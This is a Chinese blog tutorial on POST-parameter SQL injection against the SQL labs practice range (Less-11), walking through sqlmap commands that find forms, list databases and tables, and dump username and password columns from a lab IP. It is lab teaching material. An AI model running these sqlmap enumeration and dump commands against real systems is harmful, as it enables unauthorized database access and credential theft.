SQL labs-SQL注入(四,sqlmap对于post传参方式的注入)

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

序言:本文主要讲解基于SQL labs靶场,sqlmap工具进行的post传参方式的SQL注入。

传参方式有两类,一类是直接在url栏内进行url编码后进行的传参,这种传参方式保密性不强,容易被修改;另一类则是url栏内部无显示,传参保密性较强。

一,抓包。(SQL labs-less11)

使用任意抓包软件进行抓包。

发现传参方式确实为POST形式。

二,sqlmap使用。

复制代码
 sqlmap -u http://172.168.10.129:8001/Less-11/ --forms

使用 sqlmap 的 --forms 参数自动搜索表单(在sqlmap使用过程中,会有很多选项,全部选择y确认)。

三,选择注入点。

此处说明有多个注入点,请选择一个进行注入,此处选择0。

失败了,重新编辑,加入--dbs参数。

复制代码
sqlmap -u http://172.168.10.129:8001/Less-11/ --forms --dbs

成功。

四,得到表名。

复制代码
 sqlmap -u http://172.168.10.129:8001/Less-11/ --forms -D 'security' --tables 

五,得到字段名。

六,得到敏感信息。

复制代码
sqlmap -u http://172.168.10.129:8001/Less-11/ --forms -D 'security' -T users -C passwrd,username --dump

但这里显示都是空的。

七,总结。

post与get传参并无明显差别,工具使用大同小异,手工post注入与get并无明显差别。下一篇文章将会讲解SQL注入-post手工注入。

相关推荐
阿里云大数据AI技术8 小时前
Hologres AI Function 文本分类实战:从提示词设计到 KV-Cache 调优,全程 SQL 搞定
人工智能·sql
白帽小丑9 小时前
# 一次 MySQL DELETE 误操作的数据恢复尝试实录
数据库·mysql
Quincy_Freak11 小时前
信创内网数据规范实践:银河麒麟下SQLite本地数据安全管理方案
数据库·sqlite·arm·数据库管理·大数据分析·银河麒麟·aarch64
2601_9626838913 小时前
治理遗留系统中的“生肉 SQL”:一次用多模型协作优化慢查询的实战复盘
数据库·人工智能·sql
酱学编程14 小时前
【从零到一实现一个 AI Agent 框架 · 第四篇】04. 任务规划:拆解复杂目标 -
服务器·网络·数据库·人工智能
shushangyun_15 小时前
2026智能采购商城系统选型指南:如何引领企业数字化采购升级
java·大数据·数据库·人工智能·机器学习
dexi.Chi 攻城狮15 小时前
SQL层次查询语法
经验分享·笔记·sql
华山令狐虫16 小时前
DBAPI AI 写 SQL:支持动态 SQL 与参数占位符,自然语言一键生成
数据库·人工智能·sql·dbapi
IvorySQL16 小时前
PG 技术日报|2026-07-04
数据库·人工智能·postgresql·开源
Hoxy.R16 小时前
KingbaseES读写分离高可用集群扩容、备库重建与故障切换实战
运维·数据库